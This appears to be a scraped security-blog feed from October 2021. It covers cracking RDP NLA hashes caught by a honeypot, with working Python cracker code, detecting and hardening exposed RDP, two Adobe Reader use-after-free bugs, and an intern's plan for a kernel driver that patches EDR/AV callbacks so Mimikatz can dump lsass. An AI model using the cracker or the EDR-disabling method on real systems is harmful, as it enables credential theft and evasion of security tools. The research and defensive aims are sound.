
Threat Roundup for October 15 to October 22

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 15 and Oct. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Cracking RDP NLA Supplied Credentials for Threat Intelligence

21 October 2021 at 19:40
By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may attempt to connect with NLA enabled, a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords sent over NLA connections to ascertain the passwords supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which includes the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server implementation that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server implementation that supports NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we identified six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse them. For a proof of concept, we wrote a parser for these six messages in Python to gain a high-level understanding of what was needed to crack the hashes contained within the messages. We parsed each field into its own object, taking hints from the FreeRDP code.
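
To give a feel for the parsing involved, below is a minimal sketch (not the actual nlahoney parser) of extracting fields from an NTLM AUTHENTICATE message in Python. It assumes the raw NTLMSSP payload has already been unwrapped from its CredSSP/TSRequest encoding; the offsets follow the MS-NLMP layout:

import struct

def read_field(buf, off):
    # Each NTLM "security buffer" descriptor is Len (u16), MaxLen (u16), Offset (u32)
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]

def parse_authenticate(buf):
    # AUTHENTICATE_MESSAGE: 8-byte signature, then MessageType == 3
    assert buf[:8] == b"NTLMSSP\x00"
    assert struct.unpack_from("<I", buf, 8)[0] == 3
    return {
        "NtChallengeResponse": read_field(buf, 20),
        "Domain": read_field(buf, 28).decode("utf-16-le"),
        "User": read_field(buf, 36).decode("utf-16-le"),
        "EncryptedRandomSessionKey": read_field(buf, 52),
        "MIC": buf[72:88],  # present when the message carries a Version and MIC
    }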

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of the function), we also added code to individual functions to dump raw bytes that were given as inputs and outputs in order to ensure that the calculations were correctly done in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authenticate In” message from the client. At that point, it takes all the previous messages, performs a calculation over them, and compares the result with the “MIC” stored in the “Authenticate In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian;
# per MS-NLMP, User is uppercased before hashing
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, UpperCase(User) + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!
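
As a minimal sketch of that dictionary attack in Python (assuming the relevant fields have already been parsed out of the captured messages, and noting that hashlib's "md4" may require OpenSSL's legacy provider on newer systems):

import hashlib, hmac

def rc4(key, data):
    # Minimal RC4, used here only to decrypt the EncryptedRandomSessionKey
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def check(password, user, domain, temp_chal, enc_session_key, mic_msg, mic):
    # Mirrors the MIC algorithm above
    nt_hash = hashlib.new("md4", password.encode("utf-16-le")).digest()
    v2_hash = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    nt_proof = hmac.new(v2_hash, temp_chal, "md5").digest()
    key_exchange_key = hmac.new(v2_hash, nt_proof, "md5").digest()
    session_key = rc4(key_exchange_key, enc_session_key) if enc_session_key else key_exchange_key
    return hmac.new(session_key, mic_msg, "md5").digest() == mic

def crack(wordlist, **fields):
    with open(wordlist, encoding="utf-8", errors="ignore") as f:
        for line in f:
            candidate = line.rstrip("\r\n")
            if check(candidate, **fields):
                return candidate
    return None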

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project has been open sourced at https://github.com/nccgroup/nlahoney, along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker as a hashcat module, which is left as an exercise for the reader.

Threat Source newsletter (Oct. 21, 2021)

21 October 2021 at 18:00
Newsletter compiled by Jon Munshaw. Good afternoon, Talos readers. We're writing this on Wednesday for PTO reasons, so apologies if we miss any major news that happens after Wednesday afternoon. Above, you can watch our awesome live stream from Monday with Brad Garnett from...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

21 October 2021 at 16:48

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems can get a remote desktop session to manage one or more workstations and/or servers remotely. As more organizations opt for remote work, RDP usage over the internet has also increased. However, RDP was not initially designed with the security and privacy features needed to use it securely over the internet. RDP communicates over the widely known port 3389, making it very easy for criminal threat actors to discover. Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and of similar solutions such as TeamViewer (port 5938) and VNC (port 5900), are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.”

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE-2019-0708), first reported in May 2019, was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7. Subsequently, September 2019 saw the public release of a wormable exploit for the vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increase the risk to organizations with instances of RDP exposed to the internet. By default, RDP does not have built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further heightened by users’ propensity for password reuse. If employees use the same password for RDP as they do for other websites, then when a website is breached, threat actors will likely add that password to a list for use in brute-force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP. Short, easily remembered passwords give threat actors an increased chance of success when brute-forcing exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

RDP logons or attacks will generate several log events across several event logs. These events will be found on the target systems where RDP sessions were attempted or completed, or on the Active Directory domain controllers that handled the authentication. These events need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior. There are also events on the source system that can be collected, but we will save those for another blog.

Given that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activity. For investigations, if malicious behavior is suspected, the more logs the better.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, the more low-noise, low-volume, high-validity events you can collect from all endpoints into a log management solution, the better your detection of malicious activity can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used; these events contain a lot of detail about all authentication to a system, making this a high-volume event (a query sketch follows the list):

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging on
  • Workstation Name = The name of the source system the logon originated from
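
As a rough, hedged sketch, these events can be pulled with the built-in wevtutil utility from an elevated prompt (the XPath filter below is illustrative, not SIEM-specific query syntax):

import subprocess

# Successful logons (Event ID 4624) with LogonType 10 (RemoteInteractive, i.e. RDP)
query = ("*[System[(EventID=4624)] and "
         "EventData[Data[@Name='LogonType']='10']]")

result = subprocess.run(
    ["wevtutil", "qe", "Security", "/q:" + query, "/f:text", "/c:20"],
    capture_output=True, text=True, check=True)
print(result.stdout)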

Optionally, another logon can be enabled to collect RDP events, but this will also generate a lot of other logon noise.  The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used; these events contain a few details about session authentication to a system, so this is a low-volume event:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name of the session being reconnected or disconnected
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP-specific logs that record valuable events which can be investigated during an incident to determine the source of an RDP login. Fortunately, the Windows Advanced Audit Policy does not need to be updated to collect these events; they are on by default.

The following query logic can be used; these events contain a few details about RDP connections to a system, so this is a low-volume event:

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, Event ID 24 (disconnect) will still be created after the logs have been cleared, when the user disconnects. This allows tracing of the path the user and/or threat actor took from system to system.
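
Below is a hedged sketch of pulling those connect/disconnect events to build such a trace; the channel name and XML layout are as observed on recent Windows versions, and the user and source address for each event live under its UserData element:

import subprocess
import xml.etree.ElementTree as ET

CHANNEL = "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Event ID 21 = RDP connect, Event ID 24 = RDP disconnect
raw = subprocess.run(
    ["wevtutil", "qe", CHANNEL, "/q:*[System[(EventID=21 or EventID=24)]]",
     "/f:xml", "/e:Events"],
    capture_output=True, text=True, check=True).stdout

for event in ET.fromstring(raw):
    system = event.find(NS + "System")
    event_id = system.find(NS + "EventID").text
    when = system.find(NS + "TimeCreated").get("SystemTime")
    print(event_id, when)  # the user and source address are in the UserData element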

The following query logic can be used; these events contain a few details about RDP connections to a system, so this is a low-volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient/Operational

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system the RDP connection was made to (the destination)

Threat Hunting

The event IDs previously mentioned are a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need a way to check each workstation and server for these events in the appropriate log, or use a log management/SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately the disconnect event will remain in the logs, allowing the investigator to see the source of the RDP disconnect. This disconnect (Event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet. NCC Group has investigated many incidents where our customers had RDP open to the internet, only to find that it was actively under attack without their knowledge, or that it was the source of the compromise. Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding an alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role added to a Windows Server that you publish to the internet; it provides SSL-encrypted RDP (over TCP port 443 and UDP port 3391) instead of the RDP protocol over port 3389. The RD Gateway option is more secure than RDP alone, but it should still be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN. If VPN infrastructure is already in place, organizations can easily adjust their firewalls to accommodate this. Organizations should also monitor VPN logins for access attempts, resolving source IPs to their country of origin. Known-good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before connecting to internal systems via RDP. However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as quickly as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended as a way to simply prevent RDP attacks, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture attempts against port 3389; a sketch of the registry change follows. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port, after which an attacker can simply change their target port.
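
For illustration, the listening port lives under a well-known registry value. A minimal sketch of the change (requires administrator rights; the new port only takes effect after a reboot or Remote Desktop Services restart, and firewall rules must be updated to match):

import winreg

NEW_PORT = 3390  # hypothetical replacement port

key = winreg.OpenKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp",
    0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "PortNumber", 0, winreg.REG_DWORD, NEW_PORT)
winreg.CloseKey(key)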

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance, or Windows Firewall on the host machines managed by Group Policy, to restrict RDP connections to known-good IP addresses; a sketch follows. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, it is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.
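
As a sketch using the built-in netsh tool (the rule name and addresses are placeholders, and this assumes the default inbound-block posture so that only the allow rule admits RDP traffic):

import subprocess

ALLOWED = "203.0.113.10,203.0.113.11"  # placeholder known-good addresses

subprocess.run([
    "netsh", "advfirewall", "firewall", "add", "rule",
    "name=RDP-known-good-only", "dir=in", "action=allow",
    "protocol=TCP", "localport=3389", "remoteip=" + ALLOWED,
], check=True)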

Conclusion

Organizations should take careful consideration when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP. 

CVE-2021-28632 & CVE-2021-39840: Bypassing Locks in Adobe Reader

21 October 2021 at 16:12

Over the past few months, Adobe has patched several remote code execution bugs in Adobe Acrobat and Reader that were reported by researcher Mark Vincent Yason (@MarkYason) through our program. Two of these bugs in particular, CVE-2021-28632 and CVE-2021-39840, are related use-after-free bugs, even though they were patched months apart. Mark has graciously provided this detailed write-up of these vulnerabilities and their root cause.


This blog post describes two Adobe Reader use-after-free vulnerabilities that I submitted to ZDI: One from the June 2021 patch (CVE-2021-28632) and one from the September 2021 patch (CVE-2021-39840). An interesting aspect about these two bugs is that they are related – the first bug was discovered via fuzzing and the second bug was discovered by reverse engineering and then bypassing the patch for the first bug.

CVE-2021-28632: Understanding Field Locks

One early morning while doing my routine crash analysis, one Adobe Reader crash caught my attention:

After a couple of hours minimizing and cleaning up the fuzzer-generated PDF file, the resulting simplified proof-of-concept (PoC) was as follows:

PDF portion (important parts only):

JavaScript portion:

The crash involved a use-after-free of CPDField objects. CPDField objects are internal AcroForm.api C++ objects that represent text fields, button fields, etc. in interactive forms.

In the PDF portion above, two CPDField objects are created to represent the two text fields named fieldParent and fieldChild. Note that the created objects have the type CTextField, a subclass of CPDField, which is used for text fields. To simplify the discussion, they will be referred to as CPDField objects.

An important component for triggering the bug is that fieldChild should be a descendant of fieldParent by specifying it in the /Kids key of the fieldParent PDF object dictionary (see [A] above) as documented in the PDF file format specification:

[Image: excerpt from the PDF specification describing the /Kids key]

Another important concept relating to the bug is that to prevent a CPDField object from being freed while it is in use, an internal property named LockFieldProp is used. Internal properties of CPDField objects are stored via a C++ map member variable.

If LockFieldProp is not zero, it means that the CPDField object is locked and can't be freed; if it is zero or is not set, it means that the CPDField object is unlocked and can be freed. Below is the visual representation of the two CPDField objects in the PoC before the field locking code (discussed later) is called: fieldParent is unlocked (LockFieldProp is 0) and is in green, and fieldChild is also unlocked (LockFieldProp is not set) and is also in green:

[Image: fieldParent (LockFieldProp: 0) and fieldChild (LockFieldProp unset), both unlocked and shown in green]

On the JavaScript portion of the PoC, the code sets up a JavaScript callback so that when the “Format” event is triggered for fieldParent, a custom JavaScript function callback() will be executed [2]. The JavaScript code then triggers a “Format” event by setting the textSize property of fieldParent [3]. Internally, this executes the textSize property setter of JavaScript Field objects in AcroForm.api.

One of the first actions of the textSize property setter in AcroForm.api is to call the following field locking code against fieldParent:

The above code locks the CPDField object passed to it by setting its LockFieldProp property to 1 [AA].

After executing the field locking code, the lock state of fieldParent (locked: in red) and fieldChild (unlocked: in green) are as follows:

[Image: fieldParent locked (red), fieldChild unlocked (green)]

Note that in later versions of Adobe Reader, the value of LockFieldProp is a pointer to a counter instead of being set to 1 or 0.

Next, the textSize property setter in AcroForm.api calls the following recursive CPDField method where the use-after-free occurs:

On the first call to the above method, the this pointer points to the locked fieldParent CPDField object. Because it has no associated widget [aa], the method performs a recursive call [cc] with the this pointer pointing to each of fieldParent's children [bb].

Therefore, on the second call to the above method, the this pointer points to the fieldChild CPDField object, and since it has an associated widget (see [B] in the PDF portion of the PoC), a notification is triggered [dd] that results in the custom JavaScript callback() function being executed. As shown in the previous illustration, the locking code only locked fieldParent, while fieldChild was left unlocked. Because fieldChild is unlocked, the removeField("fieldChild") call in the custom JavaScript callback() function (see [1] in the JavaScript portion of the PoC) succeeds in freeing the fieldChild CPDField object. This causes the this pointer in the recursive method to become a dangling pointer after the call in [dd]. The dangling this pointer is later dereferenced, resulting in the crash.

This first vulnerability was patched in June 2021 by Adobe and assigned CVE-2021-28632.

CVE-2021-39840: Reversing Patch and Bypassing Locks

I was curious to see how Adobe patched CVE-2021-28632, so after the patch was released, I decided to look at the updated AcroForm.api.

Upon reversing the updated field locking code, I noticed the addition of a call to a method that locks the passed field’s immediate descendants:

With the added code, both fieldParent and fieldChild will be locked and the PoC for the first bug will fail in freeing fieldChild:

[Image: fieldParent and fieldChild both locked (red)]

While assessing the updated code, I arrived at a thought: since the locking code only additionally locks the immediate descendants of the field, what if the field has a non-immediate descendant... a grandchild field! I quickly modified the PoC for CVE-2021-28632 to the following:

PDF portion (important parts only):

JavaScript portion:

And then loaded the updated PoC in Adobe Reader under a debugger, hit go... and crash!

The patch was bypassed, and Adobe Reader crashed at the same location in the previously discussed recursive method where the use-after-free originally occurred.

Upon further analysis, I confirmed that the illustration below was the state of the field locks when the recursive method was called. Notice that fieldGrandChild is unlocked, and therefore, can be freed:

[Image: fieldParent and fieldChild locked (red); fieldGrandChild unlocked (green)]

The recursive CPDField method started with the this pointer pointing to fieldParent, and then called itself with the this pointer pointing to fieldChild, and then called itself again with the this pointer pointing to fieldGrandChild. Since fieldGrandChild has an attached widget, the JavaScript callback() function that frees fieldGrandChild was executed, effectively making the this pointer a dangling pointer.

This second vulnerability was patched in September 2021 by Adobe and assigned CVE-2021-39840.

Controlling Field Objects

Control of the freed CPDField object is straightforward via JavaScript: after the CPDField object is freed via the removeField() call, the JavaScript code can spray the heap with similarly sized data or an object to replace the contents of the freed CPDField object.

When I submitted my reports to ZDI, I included a second PoC that demonstrates full control of the CPDField object and then dereferences a controlled, virtual function table pointer:

Conclusion

Implementations of object trees, particularly those in applications where the objects can be controlled and destroyed arbitrarily, are prone to use-after-free vulnerabilities. For developers, special attention must be paid to the implementation of object reference tracking and object locking. For vulnerability researchers, such implementations represent opportunities for uncovering interesting vulnerabilities.


Thanks again to Mark for providing this thorough write-up. He has contributed many bugs to the ZDI program over the last few years, and we certainly hope to see more submissions from him in the future. Until then, follow the team for the latest in exploit techniques and security patches.

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blog post, I have to admit it wasn’t as scary or difficult as I thought it would be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API (ntdll.dll), the WIN32 subsystem (kernel32.dll, user32.dll, advapi32.dll, ...) and all the user processes and applications. When applications or processes need more advanced access or control over hardware devices, memory, CPU, etc., they use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll load a number, called the “system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

As opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite memory belonging to other drivers, or even to the kernel itself. When this occurs and causes the driver to crash, the entire operating system crashes with it.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware; there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since the Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll transitions to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system; if something goes wrong, it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to patching the SSDT in x64 versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action; when that action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well-known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array, and then patch any entries belonging to EDR/AV drivers by replacing the first instruction of their callback function (0xFA7F) with a RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou, which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First, the build target should be Debug – x64. Next, I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

